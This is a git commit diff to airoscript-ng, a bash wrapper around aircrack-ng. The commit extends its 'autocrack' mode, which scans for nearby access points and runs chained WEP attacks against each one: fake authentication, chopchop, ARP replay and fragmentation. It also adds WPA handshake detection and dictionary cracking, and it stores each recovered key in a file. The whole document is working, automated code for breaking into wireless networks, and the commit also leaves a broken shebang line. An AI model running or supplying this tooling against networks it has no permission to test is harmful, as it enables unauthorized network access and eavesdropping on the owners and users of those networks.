Fixed lots of stuff in automatic cracking. Now autocrack works with WPA. More improvements on speed.
git-svn-id: http://svn.aircrack-ng.org/branch/airoscript-ng@1945 28c6078b-6c39-48e3-add9-af49d547ecab

diff --git a/src/functions/autocrack b/src/functions/autocrack
--- a/src/functions/autocrack
+++ b/src/functions/autocrack
@@ -1,4 +1,4 @@
-#!/bin/bash
+#!bin/bash
 # Autocrack functions file for airoscript.
 
 # Copyright (C) 2011 David Francos Cuartero
@@ -16,29 +16,18 @@
 #        along with this program; if not, write to the Free Software
 #        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 
-filter_ssid(){
-    sleep 3; echo # ... must be like this for good-looking foo.
-    [[ "$filter_ssid" != "" ]] && {
-        tag; warn "${mark}Filtering essid to $filter_ssid";
-        grep $filter_ssid $DUMP_PATH/dump-02.csv > $DUMP_PATH/dump-03.csv;
-    } || {
-        cp $DUMP_PATH/dump-02.csv $DUMP_PATH/dump-03.csv;
-    }
-}
-
 unknown(){
     ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
     head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump-02.csv
 }
 
-count_aps(){ a=($(wc -l $DUMP_PATH/dump-03.csv)); echo ${a[0]}; } # benchmarks shows this is a little more efficent than using cut.
+count_aps(){ a=($(wc -l $DUMP_PATH/dump-02.csv)); echo ${a[0]}; } # benchmarks shows this is a little more efficent than using cut.
 
 doauto(){
     source $path/autopwn
     F=0; export AUTO=1; export QUIET=1; export INTERACTIVE=0
     autoscan_autopwn;
     unknown;
-    filter_ssid;
     MAX_TARGETS=$(count_aps);
     echo;
     attack_functions_wep=(wep_attacks_fakeauto wep_attacks_fakeinteractive wep_attacks_chopchop wep_attacks_caffelate wep_attacks_hirte wep_attacks_arpreplay_auto wep_attacks_arpreplay_interactive wep_attacks_fragmentation wep_attacks_chopchopclient wep_attacks_pskarp)
@@ -48,6 +37,7 @@ doauto(){
     for i in `seq 1 $MAX_TARGETS`; do
         tag; warn "${mark}Trying to crack target $i"
         export AUTO=2; selectAp;  sleep 1
+        export writekey="-l $DUMP_PATH/$Host_MAC.key"
         if [ "$Host_SSID" != "" ]; then autopwn; 
         else tag; warn "${mark}Couldn't find essid, next try"; fi
     done
@@ -60,34 +50,43 @@ doauto(){
 }
 
 continue_autocrack(){
-    single_question "Press c to configure, q to quit, any key to continue"
-    [[ "$ans" == "c" ]] && configure; [[ "$ans" == "q" ]] && { check_function doexit || source $path/internal/exit; doexit killme ; }
+    read -p "Press c to configure, q to quit, any key to continue" -n1 ans
+    [[ "$ans" == "c" ]] && configure;
+    [[ $ans == "q" ]] && { 
+        echo;
+        warn "${mark}Exiting..."
+        check_function doexit || source $path/internal/exit; 
+        doexit killme ;
+    }
 }
 
 autopwn(){
     check_function cleanp || source $path/internal/childs
+
     F=0; export AUTO=1; export QUIET=1; export INTERACTIVE=0; next=0;
     sleep 1
     count=0
-    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && attack_functions=${attack_functions_wpa[@]} || attack_functions=${attack_functions_wep}
+    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && { attack_functions=${attack_functions_wpa[@]}; min_ivs=10; } || attack_functions=${attack_functions_wep}
 
+    
     for i in ${attack_functions[@]}; do
         tag; echo "${mark}Attack $count. Using $i in $Host_MAC"
-        $i & cleanp & get_current_ivs
+        $i & cleanp & get_min_ivs
         tag; warn "${mark}Needed ivs: $min_ivs"
         while [ "1" ]; do 
             sleep 5 && { 
-                [[ "`check_all_ivs`" -gt "$min_ivs" ]] && { 
-                    echo; warn "${mark}Trying to crack network, we have enough ivs";
+                [[ $(check_if_worked) ]] && { 
+                    echo; warn "${mark}Trying to crack network, we have enough ivs or handshakes.";
                     cleanautovars;
-                    auto autocrack;
+                    auto autocrack
                     cleanautovars;
-                    reset;
-                    echo "${mark}Network cracked, password stored in $DUMP_PATH/$Host_MAC.key"; 
+                    [[ -e $DUMP_PATH/$Host_MAC.key ]] && warn "${mark}Network cracked, password stored in $DUMP_PATH/$Host_MAC.key" || warn "${mark}Network NOT cracked. Something failed, if your enc is WPA probably key is not in your ~/.airoscript/wordlist.txt"
                     continue_autocrack
+                 } || {
+                    specialwarn "\r${mark}Current IVS: `check_all_ivs`"  ;
                 }
             }
-            specialwarn "\r${mark}Current IVS: `check_all_ivs`"  ;
+
         done
         count=$(( $count + 1 ))
     done
@@ -97,25 +96,26 @@ autopwn(){
 
 }
 
-check_all_ivs(){
-    for i in $DUMP_PATH/$Host_MAC*.cap; do
-        cur=`ivstools --convert $i $DUMP_PATH/temporal|awk '/IVs/ {print $2}'`
-        if [ "$cur" = "" ]; then cur=0; fi
-        maxn=$(( $maxn + $cur ))
-    done
-    if [ "$maxn" == "" ]; then echo 0; fi
-    echo $maxn
-}
+check_all_ivs(){  awk "/^$Host_MAC/ { gsub(/,/, \"\", \$13); print \$13; }" ${DUMP_PATH}/${Host_MAC}-01.csv; }
 
-get_current_ivs(){
+get_min_ivs(){
+    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && {  min_ivs=10; return; }
     auto return_ivs; a=$?
     [[ "$a" == 255 ]] && min_ivs=$autopwn_min_ivs || min_ivs=$a
 }
 
+check_if_handshake(){ # TODO: In docs, add tcpdump as a requirmen # TODO: In docs, add tcpdump as a requirment for this... =(
+    (( $({ tcpdump -r  $DUMP_PATH/$Host_MAC-01.cap  -e ether proto 0x888e|wc -l; } 2>/dev/null ) > 1 ))
+}
+
 check_if_worked(){
-    get_current_ivs
-    echo $'\t' "${mark}Minium ivs required for this network: $min_ivs"
-    civs=`check_all_ivs`; echo $'\t' "${mark}Current IVSs: $civs"
-    if [ "`check_all_ivs`" -gt $min_ivs ]; then echo $'\t' "${mark}It worked, I have $min_ivs =)"; return 0; fi
-    return 1
+    [[ "$Host_ENC" =~ (.*)WPA(.*) ]] && {
+        check_if_handshake && {
+            tag; warn "${mark}Got WPA handshake"
+            return 0
+        } || {
+            return 1;
+        }
+    }
+    get_min_ivs; (( "`check_all_ivs`" > $min_ivs ))
 }
diff --git a/src/functions/crack/main b/src/functions/crack/main
--- a/src/functions/crack/main
+++ b/src/functions/crack/main
@@ -22,14 +22,14 @@ crack_wep(){
         fi
 
 		while true; do
-            mkmenu "WEP Cracking Options" "aircrack-ng defaults" "aircrack-ng Korek" "aircrack-ng interactive" "Return to main menu"
+            [[ $1 ]] && choice=$1 || mkmenu "WEP Cracking Options" "aircrack-ng defaults" "aircrack-ng Korek" "aircrack-ng interactive" "Return to main menu"
 	        case $choice in
- 	    	    1 ) execute "Cracking wep, default options" crack "$pipe $AIRCRACK -0 -a 1 -b $Host_MAC -f $FUDGEFACTOR -l $DUMP_PATH/$Host_MAC.key -0 -s $DUMP_PATH/$Host_MAC-01.cap $crack_extra_opts"; $clear; break ;;
-	    	    2 ) execute "Cracking wep, Korek" crack $AIRCRACK -0 -a 1 -b $Host_MAC -f $FUDGEFACTOR -l $DUMP_PATH/$Host_MAC.key -0 -s $DUMP_PATH/$Host_MAC-01.cap -K $crack_extra_opts ; $clear; break ;;
+ 	    	    1 ) execute "Cracking wep, default options" crack "$pipe $AIRCRACK -0 -a 1 -b $Host_MAC -f $FUDGEFACTOR -l $DUMP_PATH/$Host_MAC.key -0 -s $DUMP_PATH/$Host_MAC-01.cap $crack_extra_opts $writekey"; $clear; break ;;
+	    	    2 ) execute "Cracking wep, Korek" crack "$AIRCRACK -0 -a 1 -b $Host_MAC -f $FUDGEFACTOR -l $DUMP_PATH/$Host_MAC.key -0 -s $DUMP_PATH/$Host_MAC-01.cap -K $crack_extra_opts $writekey" ; $clear; break ;;
 	            3 ) single_question "Insert Fudge Factor: ";  FUDGE_FACTOR="$ans";
                 single_question "`gettext 'Type encryption size (64,128...): '`"; ENC_SIZE="$ans";
 			    execute "Cracking wep, manual options" crack "$pipe $AIRCRACK -0 -a 1 -b $Host_MAC -f $FUDGE_FACTOR\
-                -n $ENC_SIZE -0 -s $DUMP_PATH/$Host_MAC-*.cap -f $DUMP_PATH/$Host_MAC.key $crack_extra_opts" &  $clear; 
+                -n $ENC_SIZE -0 -s $DUMP_PATH/$Host_MAC-*.cap -f $DUMP_PATH/$Host_MAC.key $crack_extra_opts $writekey" &  $clear; 
                 break ;;  
                 4 ) break ;;
 	    	* ) echo "`gettext 'Unknown response. Try again'`" ;;
@@ -38,9 +38,8 @@ crack_wep(){
 }
 
 crack_wpa(){
-            warn "${mark}Cracking wpa"
-		    while true; do
-                mkmenu "WPA Cracking Options" "Standard" "Use precomputed pmk database" "Return to main menu"
+		    while true; do 
+                [[ $1 ]] && choice=$1 || mkmenu "WPA Cracking Options" "Standard" "Use precomputed pmk database" "Return to main menu"
                 case $choice in
                     1)  if [ ! -e $WORDLIST ]; then 
                             [[ $pipe ]] && {
@@ -53,16 +52,17 @@ crack_wpa(){
                                 warn "Sorry, you cant crack wpa without a dictionary on $WORDLIST"; sleep 3; 
                             }
                         else
+                            $clear;
                             execute "Cracking WPA" crack "$AIRCRACK -a 2\
                                 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap\
-                                -w $WORDLIST"  ;
+                                -w $WORDLIST $writekey"  ;
                             $clear;
                         fi
                         break
                         ;;
                     2)  $clear; read -p "Enter Database location [$db_location]" db_location_;
                         [[ $db_location ]] && db_location=db_location_;
-                        execute "Cracking WPA with pmk database" crack  "$pipe $AIRCRACK -b $Host_MAC -s $DUMP_PATH/$Host_MAC-01.cap -r $db_location"; break;;
+                        execute "Cracking WPA with pmk database" crack  "$pipe $AIRCRACK -b $Host_MAC -s $DUMP_PATH/$Host_MAC-01.cap -r $db_location $writekey"; break;;
                     3 ) break ;;
 	    	        * ) echo "`gettext 'Unknown response. Try again'`" ;;
         		esac
@@ -73,7 +73,31 @@ selectcracking(){
 	if [ "$Host_ENC" = "OPN" ] || [ "$Host_ENC" = "" ] || [ "$Host_ENC" = " OPN " ]; then
 		$clear && _ "ERROR: Network not encrypted or no network selected "
 	else
-		if [ "$Host_ENC" = " WEP " ] || [ "$Host_ENC" = "WEP" ]; then crack_wep
-        else crack_wpa; fi
+		if [ "$Host_ENC" = " WEP " ] || [ "$Host_ENC" = "WEP" ]; then crack_wep $@
+        else crack_wpa $@; fi
 	fi
 }
+
+auto(){
+    if [ "$Host_SSID" == "" ]; then clear; echo -e "`gettext 'Error: You must select a target first'`\n"; return; fi
+    check_function digenpy_ && {
+        if [[ $1 == "return_ivs" ]]; then
+            for function in "Telefonica" "Jazztel" ; do test=1; $function; test=0; [[ "$avail" == "1" ]] && return 4; done
+            return 255
+        else
+            for function in "Telefonica" "Jazztel"; do warn "Trying  $function"; $function; [[ "$cracked" == "1" ]] && return; done
+            warn "${mark}Cant crack this network with digenpy, doing it manually"
+        fi
+    } || {
+        [[ $1 == "return_ivs" ]] && return 255 
+    }
+
+    if [ "$1" == "autocrack" ]; then
+        export wait_for_execute=1; AUTO=1; selectcracking 1; AUTO=0; export wait_for_execute=0;
+    else
+        selectcracking
+    fi
+
+
+}
+
